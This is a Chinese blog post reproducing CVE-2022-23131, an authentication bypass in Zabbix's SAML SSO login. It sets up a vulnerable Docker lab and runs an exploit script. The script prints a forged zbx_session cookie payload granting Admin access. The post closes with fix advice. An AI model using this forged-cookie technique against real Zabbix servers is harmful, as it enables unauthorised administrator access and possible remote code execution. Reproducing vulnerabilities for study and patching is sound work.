zabbix最新漏洞,可绕过认证登陆!

简介: Zabbix对客户端提交的`Cookie`会话存在不安全的存储方式,导致在启动`SAML SSO`认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限,进而可实现`RCE`。

漏洞概述

漏洞编号:CVE-2022-23131
漏洞威胁等级:高危

Zabbix是一个非常流行的开源监控平台,用于收集、集中和跟踪整个基础设施中的 CPU 负载和网络流量等指标。

Zabbix对客户端提交的Cookie会话存在不安全的存储方式,导致在启动SAML SSO认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限,进而可实现RCE

影响范围

Zabbix Web前端版本包括

  • 5.4.0-5.4.8
  • 6.0.0alpha1

复现

虽然官方给是zabbix版本在5.4.0-5.4.8这个区间受影响,但是我在zabbix 5.4.11也同样复现了这个问题。

# 快速构建zabbix环境
]# docker run  --rm -d -P lutixiaya/zabbix-cve_2022_23131:latest
~]# docker ps
CONTAINER ID   IMAGE                                    COMMAND                  CREATED         STATUS         PORTS                                     NAMES
158e737a3794   lutixiaya/zabbix-cve_2022_23131:latest   "/bin/sh -c 'bash /r…"   3 seconds ago   Up 2 seconds   0.0.0.0:49153->80/tcp, :::49153->80/tcp   competent_diffie

可以看到启用了SAML认证方式,这时直接点击该认证是无法登陆的,但是通过修改cookie可以跳过认证。
image.png

修改cookie

~]#  python CVE-2022-23131.py http://ip:49153/   
未加密Payload:{"saml_data":{"username_attribute":"Admin"},"sessionid":"99c65fd664e1e0bb929d8a9d964f0a98","sign":"2cd21893210753d4d2926aa08fe7ebefdd41a8ab6413bb551ce048848b1dda44"}


加密后Payload:eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiOTljNjVmZDY2NGUxZTBiYjkyOWQ4YTlkOTY0ZjBhOTgiLCJzaWduIjoiMmNkMjE4OTMyMTA3NTNkNGQyOTI2YWEwOGZlN2ViZWZkZDQxYThhYjY0MTNiYjU1MWNlMDQ4ODQ4YjFkZGE0NCJ9
                                   

复制上面加密后Payload,修改zbx_session(在浏览器按F12,打开开发者工具)的值。
image.png

修改完成之后,再次点击SAML,可直接跳过认证登陆!
image.png

image.png

修复建议

临时方案:禁用 SAML 身份验证

推荐方案升级安全版本

对了,你们一直想要的 Linux命令大全查询 网站已经上线了,欢迎使用。

相关文章
|
12月前
|
监控 安全 Shell
Zabbix Server trapper 命令注入漏洞 (CVE-2017-2824)
Zabbix Server trapper 命令注入漏洞,攻击者可通过特定Payload获取服务器执行权限。
231 1
|
JSON 监控 前端开发
python对接API二次开发高级实战案例解析:Zabbix API封装类实现获取认证密钥、所有主机组、所有主机、所有监控项和历史数据
python对接API二次开发高级实战案例解析:Zabbix API封装类实现获取认证密钥、所有主机组、所有主机、所有监控项和历史数据
479 0
|
存储 监控 安全
Zabbix登录绕过漏洞复现(CVE-2022-23131)
最近在复现zabbix的漏洞(CVE-2022-23131),偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。 未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。
1732 0
Zabbix登录绕过漏洞复现(CVE-2022-23131)
|
监控 数据安全/隐私保护
Zabbix SNMP认证和加密设置(学习笔记二十二)
1. 增加snmp v3用户 # service snmpd stop # net-snmp-config --create-snmpv3-user -ro -a ttlsapwd  -x DES -X ttlsades ttlsa adding the following line to /var/lib/net-snmp/snmpd.
1376 0
|
SQL 监控 安全
Zabbix 再次被爆出存在 SQL 注入漏洞,影响云上数百网站
昨晚,Zabbix 被爆出一个高危的 SQL 注入漏洞。这个漏洞本身需要登录触发,但因为大部分 Zabbix 都启用了 guest 账号,所以此漏洞相当于一个无限制的 SQL 注入漏洞,并不是外界所说的“无需登录”。
2750 0
|
监控 安全
zabbix漏洞
1.DOS漏洞 exploit:http://www.securityfocus.com/data/vulnerabilities/exploits/37308.
627 0